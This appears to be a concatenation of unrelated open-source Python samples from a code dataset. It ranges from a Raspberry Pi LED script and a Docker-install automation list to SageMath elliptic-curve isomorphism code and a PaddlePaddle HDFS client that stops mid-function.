setproctitle.setproctitle(args.proc_title)
con, cur = db_access.connect_db(database=args.database, user=args.user, password=<PASSWORD>, port=args.port, host=args.host)
update_term_info(con, cur)
if __name__ == "__main__":
main(sys.argv[1:])
| StarcoderdataPython |
3201456 | <filename>single-led.py
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setup(18,GPIO.OUT)
print "LED On"
GPIO.output(18,GPIO.HIGH)
time.sleep(1)
print "LED Off"
GPIO.output(18,GPIO.LOW)
| StarcoderdataPython |
1751654 | import keras.losses as kloss
import concise.losses as closs
from concise.losses import MASK_VALUE
import numpy as np
import keras.backend as K
import keras.layers as kl
from keras.models import Model, load_model
from keras.utils.generic_utils import deserialize_keras_object, serialize_keras_object, get_custom_objects
def test_MaskLoss():
l = closs.binary_crossentropy_masked
y_pred = np.array([0, 0.2, 0.6, 0.4, 1])
y_true = np.array([1, 0, -1, 1, 0.0])
y_true_mask = K.cast(y_true[y_true != MASK_VALUE], K.floatx())
y_pred_mask = K.cast(y_pred[y_true != MASK_VALUE], K.floatx())
y_true_cast = K.cast(y_true, K.floatx())
y_pred_cast = K.cast(y_pred, K.floatx())
res = K.eval(l(y_true, y_pred))
res_mask = K.eval(kloss.binary_crossentropy(y_true_mask, y_pred_mask))
assert np.allclose(res, res_mask)
# test serialization
s = serialize_keras_object(l)
a = deserialize_keras_object(s)
# assert a.loss == l.loss
# assert a.mask_value == l.mask_value
res2 = K.eval(a(y_true, y_pred))
assert np.allclose(res, res2)
def test_ConvDNAQuantitySplines(tmpdir):
x = np.vstack([np.arange(15), np.arange(15)])
y = np.arange(2)
inl = kl.Input((15,))
o = kl.Dense(1)(inl)
model = Model(inl, o)
model.compile("Adam", loss=closs.binary_crossentropy_masked)
model.fit(x, y)
filepath = str(tmpdir.mkdir('data').join('test_keras.h5'))
# load and save the model
model.save(filepath)
m = load_model(filepath)
assert isinstance(m, Model)
| StarcoderdataPython |
46444 | <reponame>gnubyte/publicServerAutomator<gh_stars>0
# @Author: <NAME>
# @Date 4-13-2018
# ----------------
import server
dockerInstructions = [
"apt-get update -y",
"apt-get install apt-transport-https -y",
"apt-get install software-properties-common -y",
"apt-get install curl -y",
"apt-get install gnupg2 -y",
"apt-get install git -y",
"apt-get install acl -y",
"apt-get install fail2ban -y"
'''add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"''',
"apt-get update -y",
"apt-get install docker-ce -y",
"docker run hello-world"
]
newDocker = server.Server(inputKeyPath="publickey.pem", inputKeyPassword='<PASSWORD>', inputServerIP="0.0.0.0" )
newDocker.set_commands(commandList=dockerInstructions)
newDocker.connect()
newDocker.run_commands() | StarcoderdataPython |
1705329 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
FLAGS = None
def main(_):
mnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True)
# Train & test simple softmax regression model.
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
W = tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
y = tf.matmul(x,W) + b
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y, y_))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
sess = tf.InteractiveSession()
tf.global_variables_initializer().run()
for i in range(1000):
batch = mnist.train.next_batch(100)
train_step.run(feed_dict={x: batch[0], y_: batch[1]})
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print(
accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels}))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--data_dir', type=str, default='/tmp/tensorflow/mnist/input_data',
help='Directory for storing input data')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| StarcoderdataPython |
143935 | <reponame>bopopescu/classic_diff_geom<filename>src/sage/schemes/elliptic_curves/weierstrass_morphism.py
r"""
Isomorphisms between Weierstrass models of elliptic curves
AUTHORS:
- <NAME> (2007): initial version
- <NAME> (Jan 2008): isomorphisms, automorphisms and twists
in all characteristics
"""
#*****************************************************************************
# Copyright (C) 2007 <NAME> <<EMAIL>>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.categories.morphism import Morphism
from constructor import EllipticCurve
from sage.categories.homset import Hom
class baseWI:
r"""
This class implements the basic arithmetic of isomorphisms between
Weierstrass models of elliptic curves. These are specified by
lists of the form `[u,r,s,t]` (with `u\not=0`) which specifies a
transformation `(x,y) \mapsto (x',y')` where
`(x,y) = (u^2x'+r , u^3y' + su^2x' + t).`
INPUT:
- ``u,r,s,t`` (default (1,0,0,0)) -- standard parameters of an isomorphism between Weierstrass models.
EXAMPLES::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: baseWI()
(1, 0, 0, 0)
sage: baseWI(2,3,4,5)
(2, 3, 4, 5)
sage: R.<u,r,s,t>=QQ[]; baseWI(u,r,s,t)
(u, r, s, t)
"""
def __init__(self, u=1, r=0, s=0, t=0):
r"""
Constructor: check for valid parameters (defaults to identity)
INPUT:
- ``u,r,s,t`` (default (1,0,0,0)) -- standard parameters of an isomorphism between Weierstrass models.
EXAMPLES::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: baseWI()
(1, 0, 0, 0)
sage: baseWI(2,3,4,5)
(2, 3, 4, 5)
sage: R.<u,r,s,t>=QQ[]; baseWI(u,r,s,t)
(u, r, s, t)
"""
if u==0:
raise ValueError("u!=0 required for baseWI")
self.u=u; self.r=r; self.s=s; self.t=t
def __cmp__(self, other):
"""
Standard comparison function.
The ordering is just lexicographic on the tuple `(u,r,s,t)`.
.. note::
In a list of automorphisms, there is no guarantee that the
identity will be first!
EXAMPLE::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: baseWI(1,2,3,4)==baseWI(1,2,3,4)
True
sage: baseWI(1,2,3,4)<baseWI(1,2,3,5)
True
sage: baseWI(1,2,3,4)>baseWI(1,2,3,4)
False
::
It will never return equality if other is of another type:
sage: baseWI() == 1
False
"""
if not isinstance(other, baseWI):
return cmp(type(self), type(other))
return cmp(self.tuple(), other.tuple())
def tuple(self):
r"""
Returns the parameters `u,r,s,t` as a tuple.
EXAMPLES::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: u,r,s,t=baseWI(2,3,4,5).tuple()
sage: w=baseWI(2,3,4,5)
sage: u,r,s,t=w.tuple()
sage: u
2
"""
return (self.u,self.r,self.s,self.t)
def __mul__(self, other):
r"""
Returns the Composition of this isomorphism and another.
EXAMPLES::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: baseWI(1,2,3,4)*baseWI(5,6,7,8)
(5, 56, 22, 858)
sage: baseWI()*baseWI(1,2,3,4)*baseWI()
(1, 2, 3, 4)
"""
u1,r1,s1,t1=other.tuple()
u2,r2,s2,t2=self.tuple()
return baseWI(u1*u2,(u1**2)*r2+r1,u1*s2+s1,(u1**3)*t2+s1*(u1**2)*r2+t1)
def __invert__(self):
r"""
Returns the inverse of this isomorphism.
EXAMPLES::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: w=baseWI(2,3,4,5)
sage: ~w
(1/2, -3/4, -2, 7/8)
sage: w*~w
(1, 0, 0, 0)
sage: ~w*w
(1, 0, 0, 0)
sage: R.<u,r,s,t>=QQ[]; w=baseWI(u,r,s,t)
sage: ~w
(1/u, (-r)/u^2, (-s)/u, (r*s - t)/u^3)
sage: ~w*w
(1, 0, 0, 0)
"""
u,r,s,t=self.tuple()
return baseWI(1/u,-r/(u**2),-s/u,(r*s-t)/(u**3))
def __repr__(self):
r"""
Returns the string representation of this isomorphism.
EXAMPLES::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: baseWI(2,3,4,5)
(2, 3, 4, 5)
"""
return self.tuple().__repr__()
def is_identity(self):
r"""
Returns True if this is the identity isomorphism.
EXAMPLES::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: w=baseWI(); w.is_identity()
True
sage: w=baseWI(2,3,4,5); w.is_identity()
False
"""
return self.tuple()==(1,0,0,0)
def __call__(self, EorP):
r"""
Base application of isomorphisms to curves and points: a
baseWI `w` may be applied to a list `[a1,a2,a3,a4,a6]`
representing the `a`-invariants of an elliptic curve `E`,
returning the `a`-invariants of `w(E)`; or to `P=[x,y]` or
`P=[x,y,z]` representing a point in `\mathbb{A}^2` or
`\mathbb{P}^2`, returning the transformed point.
INPUT:
- ``EorP`` -- either an elliptic curve, or a point on an elliptic curve.
OUTPUT:
The transformed curve or point.
EXAMPLES::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: E=EllipticCurve([0,0,1,-7,6])
sage: w=baseWI(2,3,4,5);
sage: w(E.ainvs())
[4, -7/4, 11/8, -3/2, -9/32]
sage: P=E(-2,3)
sage: w(P.xy())
[-5/4, 9/4]
sage: EllipticCurve(w(E.ainvs()))(w(P.xy()))
(-5/4 : 9/4 : 1)
"""
u,r,s,t=self.tuple()
if len(EorP)==5:
a1,a2,a3,a4,a6=EorP
a6 += r*(a4 + r*(a2 + r)) - t*(a3 + r*a1 + t);
a4 += -s*a3 + 2*r*a2 - (t + r*s)*a1 + 3*r*r - 2*s*t;
a3 += r*a1 +t+t;
a2 += -s*a1 + 3*r - s*s;
a1 += 2*s;
return [a1/u,a2/u**2,a3/u**3,a4/u**4,a6/u**6]
if len(EorP)==2:
x,y=EorP
x-=r
y-=(s*x+t)
return [x/u**2,y/u**3]
if len(EorP)==3:
x,y,z=EorP
x-=r*z
y-=(s*x+t*z)
return [x/u**2,y/u**3,z]
raise ValueError("baseWI(a) only for a=(x,y), (x:y:z) or (a1,a2,a3,a4,a6)")
def isomorphisms(E,F,JustOne=False):
r"""
Returns one or all isomorphisms between two elliptic curves.
INPUT:
- ``E``, ``F`` (EllipticCurve) -- Two elliptic curves.
- ``JustOne`` (bool) If True, returns one isomorphism, or None if
the curves are not isomorphic. If False, returns a (possibly
empty) list of isomorphisms.
OUTPUT:
Either None, or a 4-tuple `(u,r,s,t)` representing an isomorphism,
or a list of these.
.. note::
This function is not intended for users, who should use the
interface provided by ``ell_generic``.
EXAMPLES::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a3'))
[(-1, 0, 0, -1), (1, 0, 0, 0)]
sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a3'),JustOne=True)
(1, 0, 0, 0)
sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a1'))
[]
sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a1'),JustOne=True)
"""
from ell_generic import is_EllipticCurve
if not is_EllipticCurve(E) or not is_EllipticCurve(F):
raise ValueError("arguments are not elliptic curves")
K = E.base_ring()
# if not K == F.base_ring(): return []
j=E.j_invariant()
if j != F.j_invariant():
if JustOne: return None
return []
from sage.rings.all import PolynomialRing
x=PolynomialRing(K,'x').gen()
a1E, a2E, a3E, a4E, a6E = E.ainvs()
a1F, a2F, a3F, a4F, a6F = F.ainvs()
char=K.characteristic()
if char==2:
if j==0:
ulist=(x**3-(a3E/a3F)).roots(multiplicities=False)
ans=[]
for u in ulist:
slist=(x**4+a3E*x+(a2F**2+a4F)*u**4+a2E**2+a4E).roots(multiplicities=False)
for s in slist:
r=s**2+a2E+a2F*u**2
tlist= (x**2 + a3E*x + r**3 + a2E*r**2 + a4E*r + a6E + a6F*u**6).roots(multiplicities=False)
for t in tlist:
if JustOne: return (u,r,s,t)
ans.append((u,r,s,t))
if JustOne: return None
ans.sort()
return ans
else:
ans=[]
u=a1E/a1F
r=(a3E+a3F*u**3)/a1E
slist=[s[0] for s in (x**2+a1E*x+(r+a2E+a2F*u**2)).roots()]
for s in slist:
t = (a4E+a4F*u**4 + s*a3E + r*s*a1E + r**2)
if JustOne: return (u,r,s,t)
ans.append((u,r,s,t))
if JustOne: return None
ans.sort()
return ans
b2E, b4E, b6E, b8E = E.b_invariants()
b2F, b4F, b6F, b8F = F.b_invariants()
if char==3:
if j==0:
ulist=(x**4-(b4E/b4F)).roots(multiplicities=False)
ans=[]
for u in ulist:
s=a1E-a1F*u
t=a3E-a3F*u**3
rlist=(x**3-b4E*x+(b6E-b6F*u**6)).roots(multiplicities=False)
for r in rlist:
if JustOne: return (u,r,s,t+r*a1E)
ans.append((u,r,s,t+r*a1E))
if JustOne: return None
ans.sort()
return ans
else:
ulist=(x**2-(b2E/b2F)).roots(multiplicities=False)
ans=[]
for u in ulist:
r = (b4F*u**4 -b4E)/b2E
s = (a1E-a1F*u)
t = (a3E-a3F*u**3 + a1E*r)
if JustOne: return (u,r,s,t)
ans.append((u,r,s,t))
if JustOne: return None
ans.sort()
return ans
# now char!=2,3:
c4E,c6E = E.c_invariants()
c4F,c6F = F.c_invariants()
if j==0:
m,um = 6,c6E/c6F
elif j==1728:
m,um=4,c4E/c4F
else:
m,um=2,(c6E*c4F)/(c6F*c4E)
ulist=(x**m-um).roots(multiplicities=False)
ans=[]
for u in ulist:
s = (a1F*u - a1E)/2
r = (a2F*u**2 + a1E*s + s**2 - a2E)/3
t = (a3F*u**3 - a1E*r - a3E)/2
if JustOne: return (u,r,s,t)
ans.append((u,r,s,t))
if JustOne: return None
ans.sort()
return ans
class WeierstrassIsomorphism(baseWI,Morphism):
r"""
Class representing a Weierstrass isomorphism between two elliptic curves.
"""
def __init__(self, E=None, urst=None, F=None):
r"""
Constructor for WeierstrassIsomorphism class,
INPUT:
- ``E`` -- an EllipticCurve, or None (see below).
- ``urst`` -- a 4-tuple `(u,r,s,t)`, or None (see below).
- ``F`` -- an EllipticCurve, or None (see below).
Given two Elliptic Curves ``E`` and ``F`` (represented by
Weierstrass models as usual), and a transformation ``urst``
from ``E`` to ``F``, construct an isomorphism from ``E`` to
``F``. An exception is raised if ``urst(E)!=F``. At most one
of ``E``, ``F``, ``urst`` can be None. If ``F==None`` then
``F`` is constructed as ``urst(E)``. If ``E==None`` then
``E`` is constructed as ``urst^-1(F)``. If ``urst==None``
then an isomorphism from ``E`` to ``F`` is constructed if
possible, and an exception is raised if they are not
isomorphic. Otherwise ``urst`` can be a tuple of length 4 or
a object of type ``baseWI``.
Users will not usually need to use this class directly, but instead use
methods such as ``isomorphism`` of elliptic curves.
EXAMPLES::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: WeierstrassIsomorphism(EllipticCurve([0,1,2,3,4]),(-1,2,3,4))
Generic morphism:
From: Abelian group of points on Elliptic Curve defined by y^2 + 2*y = x^3 + x^2 + 3*x + 4 over Rational Field
To: Abelian group of points on Elliptic Curve defined by y^2 - 6*x*y - 10*y = x^3 - 2*x^2 - 11*x - 2 over Rational Field
Via: (u,r,s,t) = (-1, 2, 3, 4)
sage: E=EllipticCurve([0,1,2,3,4])
sage: F=EllipticCurve(E.cremona_label())
sage: WeierstrassIsomorphism(E,None,F)
Generic morphism:
From: Abelian group of points on Elliptic Curve defined by y^2 + 2*y = x^3 + x^2 + 3*x + 4 over Rational Field
To: Abelian group of points on Elliptic Curve defined by y^2 = x^3 + x^2 + 3*x + 5 over Rational Field
Via: (u,r,s,t) = (1, 0, 0, -1)
sage: w=WeierstrassIsomorphism(None,(1,0,0,-1),F)
sage: w._domain_curve==E
True
"""
from ell_generic import is_EllipticCurve
if E!=None:
if not is_EllipticCurve(E):
raise ValueError("First argument must be an elliptic curve or None")
if F!=None:
if not is_EllipticCurve(F):
raise ValueError("Third argument must be an elliptic curve or None")
if urst!=None:
if len(urst)!=4:
raise ValueError("Second argument must be [u,r,s,t] or None")
if len([par for par in [E,urst,F] if par!=None])<2:
raise ValueError("At most 1 argument can be None")
if F==None: # easy case
baseWI.__init__(self,*urst)
F=EllipticCurve(baseWI.__call__(self,list(E.a_invariants())))
Morphism.__init__(self, Hom(E(0).parent(), F(0).parent()))
self._domain_curve = E
self._codomain_curve = F
return
if E==None: # easy case in reverse
baseWI.__init__(self,*urst)
inv_urst=baseWI.__invert__(self)
E=EllipticCurve(baseWI.__call__(inv_urst,list(F.a_invariants())))
Morphism.__init__(self, Hom(E(0).parent(), F(0).parent()))
self._domain_curve = E
self._codomain_curve = F
return
if urst==None: # try to construct the morphism
urst=isomorphisms(E,F,True)
if urst==None:
raise ValueError("Elliptic curves not isomorphic.")
baseWI.__init__(self, *urst)
Morphism.__init__(self, Hom(E(0).parent(), F(0).parent()))
self._domain_curve = E
self._codomain_curve = F
return
# none of the parameters is None:
baseWI.__init__(self,*urst)
if F!=EllipticCurve(baseWI.__call__(self,list(E.a_invariants()))):
raise ValueError("second argument is not an isomorphism from first argument to third argument")
else:
Morphism.__init__(self, Hom(E(0).parent(), F(0).parent()))
self._domain_curve = E
self._codomain_curve = F
return
def __cmp__(self, other):
r"""
Standard comparison function for the WeierstrassIsomorphism class.
EXAMPLE::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: E=EllipticCurve('389a1')
sage: F=E.change_weierstrass_model(1,2,3,4)
sage: w1=E.isomorphism_to(F)
sage: w1==w1
True
sage: w2 = F.automorphisms()[0] *w1
sage: w1==w2
False
::
sage: E=EllipticCurve_from_j(GF(7)(0))
sage: F=E.change_weierstrass_model(2,3,4,5)
sage: a=E.isomorphisms(F)
sage: b=[w*a[0] for w in F.automorphisms()]
sage: b.sort()
sage: a==b
True
sage: c=[a[0]*w for w in E.automorphisms()]
sage: c.sort()
sage: a==c
True
"""
if not isinstance(other, WeierstrassIsomorphism):
return cmp(type(self), type(other))
t = cmp(self._domain_curve, other._domain_curve)
if t: return t
t = cmp(self._codomain_curve, other._codomain_curve)
if t: return t
return baseWI.__cmp__(self,other)
def __call__(self, P):
r"""
Call function for WeierstrassIsomorphism class.
INPUT:
- ``P`` (Point) -- a point on the domain curve.
OUTPUT:
(Point) the transformed point on the codomain curve.
EXAMPLES::
sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
sage: E=EllipticCurve('37a1')
sage: w=WeierstrassIsomorphism(E,(2,3,4,5))
sage: P=E(0,-1)
sage: w(P)
(-3/4 : 3/4 : 1)
sage: w(P).curve()==E.change_weierstrass_model((2,3,4,5))
True
"""
if P[2] == 0:
return self._codomain_curve(0)
else:
return self._codomain_curve.point(baseWI.__call__(self,tuple(P._coords)), check=False)
def __invert__(self):
r"""
Returns the inverse of this WeierstrassIsomorphism.
EXAMPLES::
sage: E = EllipticCurve('5077')
sage: F = E.change_weierstrass_model([2,3,4,5]); F
Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field
sage: w = E.isomorphism_to(F)
sage: P = E(-2,3,1)
sage: w(P)
(-5/4 : 9/4 : 1)
sage: ~w
Generic morphism:
From: Abelian group of points on Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field
To: Abelian group of points on Elliptic Curve defined by y^2 + y = x^3 - 7*x + 6 over Rational Field
Via: (u,r,s,t) = (1/2, -3/4, -2, 7/8)
sage: Q = w(P); Q
(-5/4 : 9/4 : 1)
sage: (~w)(Q)
(-2 : 3 : 1)
"""
winv=baseWI.__invert__(self).tuple()
return WeierstrassIsomorphism(self._codomain_curve, winv, self._domain_curve)
def __mul__(self,other):
r"""
Returns the composition of this WeierstrassIsomorphism and the other,
WeierstrassMorphisms can be composed using ``*`` if the
codomain & domain match: `(w1*w2)(X)=w1(w2(X))`, so we require
``w1.domain()==w2.codomain()``.
EXAMPLES::
sage: E1 = EllipticCurve('5077')
sage: E2 = E1.change_weierstrass_model([2,3,4,5])
sage: w1 = E1.isomorphism_to(E2)
sage: E3 = E2.change_weierstrass_model([6,7,8,9])
sage: w2 = E2.isomorphism_to(E3)
sage: P = E1(-2,3,1)
sage: (w2*w1)(P)==w2(w1(P))
True
"""
if self._domain_curve==other._codomain_curve:
w=baseWI.__mul__(self,other)
return WeierstrassIsomorphism(other._domain_curve, w.tuple(), self._codomain_curve)
else:
raise ValueError("Domain of first argument must equal codomain of second")
def __repr__(self):
r"""
Returns the string representation of this WeierstrassIsomorphism.
OUTPUT:
(string) The underlying morphism, together with an extra line
showing the `(u,r,s,t)` parameters.
EXAMPLES::
sage: E1 = EllipticCurve('5077')
sage: E2 = E1.change_weierstrass_model([2,3,4,5])
sage: E1.isomorphism_to(E2)
Generic morphism:
From: Abelian group of points on Elliptic Curve defined by y^2 + y = x^3 - 7*x + 6 over Rational Field
To: Abelian group of points on Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field
Via: (u,r,s,t) = (2, 3, 4, 5)
"""
return Morphism.__repr__(self)+"\n Via: (u,r,s,t) = "+baseWI.__repr__(self)
| StarcoderdataPython |
3391101 | # Generated by Django 3.1.2 on 2020-11-04 01:45
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('matchus', '0011_auto_20201104_0133'),
]
operations = [
migrations.RenameField(
model_name='chat',
old_name='sent',
new_name='date',
),
]
| StarcoderdataPython |
3317086 | <reponame>yujmo/python<gh_stars>0
def gen():
yield from subgen()
def subgen():
while True:
x = yield
yield x + 1
def main():
g = gen()
next(g)
retval = g.send(1)
print(retval)
g.throw(StopIteration)
main()
| StarcoderdataPython |
4828578 | #generate an expander graph (into a CSV file for omnetpp template)
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import os
path = r".\topologies\exp_CSV"
os.chdir(path)
n = 10 #Number of nodes
rep = 1 #number of files (always > 0)
save = False #to save the output as a SVG file
for graph_num in range(0,rep):
top = dict()
network = nx.chordal_cycle_graph(n)
edge = []
for(u,v,c) in network.edges.data():
if(u,v) not in edge and u!=v:
edge.append((u,v))
for (u,v) in edge :
if u in top:
top[u].append(v)
else:
top[u] = []
top[u].append(v)
all_idx = np.arange(0,n,1)
for idx in all_idx:
if not idx in top:
top[idx] = []
top[idx].append(-1)
top = dict(sorted(top.items()))
with open('expander' + str(graph_num) + '.csv', 'w+') as csvfile:
for site,neibs in top.items():
csvfile.write(str(site) + ',')
for neib in neibs:
if neib == neibs[-1]:
csvfile.write(str(neib) + '\n')
else:
csvfile.write(str(neib) + ',')
if(save):
fig = plt.figure(figsize=(40, 40))
nx.draw(network)
fig.savefig("exp" + str(graph_num) + ".svg")
| StarcoderdataPython |
102036 | """implements required text elements for the app"""
APP_NAME = "OSCAR"
WELCOME = "Welcome to " + APP_NAME
CREATE_PROJECT = {
'main': "Create ...",
'sub': "New " + APP_NAME + " project"
}
OPEN_PROJECT = {
'main': "Open ...",
'sub': "Existing " + APP_NAME + " project"
}
SECTIONS = {
'over': "Overview",
'energy': "Energy",
'water': "Water",
'food': "Food",
'busi': "Business"
}
| StarcoderdataPython |
3283595 | <reponame>rebryk/kaggle
from pathlib import Path
from typing import Union
import cv2
import numpy as np
def load_mask(path: Union[str, Path]) -> np.array:
"""
Read grayscale mask from the disk.
:param path: path to a local file on disk
:return: image as a NumPy array
"""
mask = cv2.imread(str(path), cv2.IMREAD_GRAYSCALE)
if mask is None:
raise RuntimeError(f'Unable to load mask {str(path)}')
return mask.astype(np.uint8)
def load_image(path: Union[str, Path]) -> np.array:
"""
Read three channel image into the RGB format.
:param path: path to a local file on disk
:return: image as a NumPy array
"""
img = cv2.imread(str(path))
if img is None:
raise RuntimeError(f'Unable to load image {str(path)}')
return cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
| StarcoderdataPython |
1711077 | import math
input_numbers = []
years = 0
init_deposit, percent, target = map(str, input().split())
init_deposit, percent, target = int(init_deposit), int(percent), int(target)
# for i in range(3):
# input_numbers.append(int(input()))
deposit = init_deposit
while deposit < target:
# deposit += init_deposit * (percent / 100)
deposit += deposit * (percent / 100)
# Seems like correct way of calculating, but some tests not working
years += 1
deposit = float("{:.2f}".format(deposit))
# print(deposit) for debug
else:
print(years) | StarcoderdataPython |
1618041 | <reponame>willthefrog/Paddle<filename>python/paddle/fluid/contrib/utils/hdfs_utils.py
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""HDFS Utils"""
import os
import sys
import subprocess
import multiprocessing
from datetime import datetime
import re
import copy
import errno
import logging
from paddle.fluid.log_helper import get_logger
__all__ = ["HDFSClient", "multi_download", "multi_upload"]
_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
class HDFSClient(object):
"""
A tool of HDFS
Args:
hadoop_home (string): hadoop_home
configs (dict): hadoop config, it is a dict, please contain \
key "fs.default.name" and "hadoop.job.ugi"
Can be a float value
Examples:
hadoop_home = "/home/client/hadoop-client/hadoop/"
configs = {
"fs.default.name": "hdfs://xxx.hadoop.com:54310",
"hadoop.job.ugi": "hello,hello123"
}
client = HDFSClient(hadoop_home, configs)
client.ls("/user/com/train-25")
files = client.lsr("/user/com/train-25/models")
"""
def __init__(self, hadoop_home, configs):
self.pre_commands = []
hadoop_bin = '%s/bin/hadoop' % hadoop_home
self.pre_commands.append(hadoop_bin)
dfs = 'fs'
self.pre_commands.append(dfs)
for k, v in configs.iteritems():
config_command = '-D%s=%s' % (k, v)
self.pre_commands.append(config_command)
def __run_hdfs_cmd(self, commands, retry_times=5):
whole_commands = copy.deepcopy(self.pre_commands)
whole_commands.extend(commands)
print('Running system command: {0}'.format(' '.join(whole_commands)))
ret_code = 0
ret_out = None
ret_err = None
whole_commands = " ".join(whole_commands)
for x in range(retry_times + 1):
proc = subprocess.Popen(
whole_commands,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
(output, errors) = proc.communicate()
ret_code, ret_out, ret_err = proc.returncode, output, errors
if ret_code:
_logger.warn(
'Times: %d, Error running command: %s. Return code: %d, Error: %s'
% (x, ' '.join(whole_commands), proc.returncode, errors))
else:
break
return ret_code, ret_out, ret_err
def upload(self, hdfs_path, local_path, overwrite=False, retry_times=5):
"""
upload the local file to hdfs
Args:
hdfs_path(str): the hdfs file path
local_path(str): the local file path
overwrite(bool|None): will overwrite the file on HDFS or not
retry_times(int|5): retry times
Returns:
True or False
"""
assert hdfs_path is not None
assert local_path is not None and os.path.exists(local_path)
if os.path.isdir(local_path):
_logger.warn(
"The Local path: {} is dir and I will support it later, return".
format(local_path))
return False
base = os.path.basename(local_path)
if not self.is_exist(hdfs_path):
self.makedirs(hdfs_path)
else:
if self.is_exist(os.path.join(hdfs_path, base)):
if overwrite:
_logger.error(
"The HDFS path: {} is exist and overwrite is True, delete it".
format(hdfs_path))
self.delete(hdfs_path)
else:
_logger.error(
"The HDFS path: {} is exist and overwrite is False, return".
format(hdfs_path))
return False
put_commands = ["-put", local_path, hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(put_commands,
retry_times)
if returncode:
_logger.error("Put local path: {} to HDFS path: {} failed".format(
local_path, hdfs_path))
return False
else:
_logger.info("Put local path: {} to HDFS path: {} successfully".
format(local_path, hdfs_path))
return True
def download(self, hdfs_path, local_path, overwrite=False, unzip=False):
"""
download file from HDFS
Args:
hdfs_path(str): the hdfs file path
local_path(str): the local file path
overwrite(bool|None): will overwrite the file on HDFS or not
unzip(bool|False): if the download file is compressed by zip, unzip it or not.
Returns:
True or False
"""
_logger.info('Downloading %r to %r.', hdfs_path, local_path)
_logger.info('Download of %s to %r complete.', hdfs_path, local_path)
if not self.is_exist(hdfs_path):
print("HDFS path: {} do not exist".format(hdfs_path))
return False
if self.is_dir(hdfs_path):
_logger.error(
"The HDFS path: {} is dir and I will support it later, return".
format(hdfs_path))
if os.path.exists(local_path):
base = os.path.basename(hdfs_path)
local_file = os.path.join(local_path, base)
if os.path.exists(local_file):
if overwrite:
os.remove(local_file)
else:
_logger.error(
"The Local path: {} is exist and overwrite is False, return".
format(local_file))
return False
self.make_local_dirs(local_path)
download_commands = ["-get", hdfs_path, local_path]
returncode, output, errors = self.__run_hdfs_cmd(download_commands)
if returncode:
_logger.error("Get local path: {} from HDFS path: {} failed".format(
local_path, hdfs_path))
return False
else:
_logger.info("Get local path: {} from HDFS path: {} successfully".
format(local_path, hdfs_path))
return True
def is_exist(self, hdfs_path=None):
"""
whether the remote HDFS path exists
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
exist_cmd = ['-test', '-e', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
exist_cmd, retry_times=1)
if returncode:
_logger.error("HDFS is_exist HDFS path: {} failed".format(
hdfs_path))
return False
else:
_logger.info("HDFS is_exist HDFS path: {} successfully".format(
hdfs_path))
return True
def is_dir(self, hdfs_path=None):
"""
whether the remote HDFS path is directory
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
if not self.is_exist(hdfs_path):
return False
dir_cmd = ['-test', '-d', hdfs_path]
